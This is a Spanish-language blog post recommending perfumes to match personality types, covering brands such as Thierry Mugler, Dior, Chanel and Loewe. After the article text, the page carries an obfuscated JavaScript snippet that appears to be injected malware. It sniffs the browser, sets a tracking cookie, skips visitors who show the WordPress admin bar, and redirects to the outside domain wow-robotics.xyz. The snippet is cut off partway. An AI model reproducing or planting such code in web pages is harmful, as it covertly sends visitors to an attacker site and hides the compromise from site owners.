Hay personas fieles a un solo aroma, ese que encuentran una vez, les enamora y ya no se separan de él. Como si de una pareja se tratase. Sin embargo, las relaciones cambian con el tiempo porque las personas evolucionamos, maduramos y a veces, lo que nos gustaba de joven ya no nos gusta cuando cumplimos unos años. Y eso, a veces también es lo que pasa con las fragancias. Puede que de joven fueras una persona muy extrovertida, sociable y que ahora te hayas vuelto romántica o bohemia. No importa porque hay un perfume perfecto para cada tipo de personalidad y edad, y hoy vas a descubrirlos.

los-mejores-perfumes-del-mercado

Consejos a tener en cuenta

Hay que tener en cuenta que el paso de los años o el tipo de piel son factores importantes a la hora de decantarnos por un olor.  A los 20 años solemos elegir olores más fuertes, explosivos y más intensos. Con el paso de los años, muchas personas prefieren fragancias más amaderadas y ligeras. La piel también es un factor a tener en cuenta: si es grasa y tiende a sudar mucho, hay que tener en cuenta que el aroma se intensificará y quizá sería más recomendable optar por un olor más suave. En cambio, si es seca, la fragancia se absorberá antes y en este caso, es más conveniente un olor más intenso y fuerte.

tips-para-que-el-perfume-dure

Elige en función de tu personalidad

 ¿Tienes rasgos de líder? Si te gusta tomar decisiones y eres una persona muy constructiva y que en un grupo no pasas desapercibida, entonces te acompañará un perfume con personalidad, con ciertas notas amaderadas y florales. El aroma Alien de Thierry Mugler sería un compañero perfecto para tu día y tu noche. Una revelación deliciosa con notas de jazmín.

Quizás tu personalidad se caracterice por ser muy noble, honesta y siempre pensando en los demás. Si eres una persona generosa y solidaria, tendrás que encontrar una colonia que vaya contigo. El Eau de Parfum Joy de Dior es un perfume inmediato, claro y generoso. Aporta mucha energía y un toque muy optimista para afrontar el día a día. Mezcla flores, cítricos y pequeñas notas de madera, aportando mucha felicidad, la misma que irradiarás cuando lo empieces a usar.

tipos-de-lociones

¿Dicen que eres una mujer decidida pero a la vez muy sencilla? Entonces te enamorará el frescor de un clásico: Eau de toilette Nº5 de Chanel. La edición limitada se presenta en un precioso frasco de color rojo y es perfecto para coleccionar, regalar o regalarse. Este aroma realza los cítricos y el olor dulce de la miel, dejando tras de sí una fragancia deliciosa con base floral. Te encantará cuando lo pruebes.

Los hombres también tienen mucho que decir en cuanto a aromas y por supuesto, también existe un tipo de fragancia idónea para cada personalidad masculina. Si eres un hombre contemporáneo, te gusta estar a la última, tienes aire urbano y te gusta estar en familia y rodeado de cariño, nuestra recomendación es Eau de Toilette de Loewe 001 Man, te cautivará su aroma amaderado con notas de lavanda y musk. Una fragancia super fresca para usar a diario y con el toque chispeante que le da la pimienta roja y la canela de Ceylán.

 ¿Cuál es tu personalidad y qué fragancia utilizas?

  var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone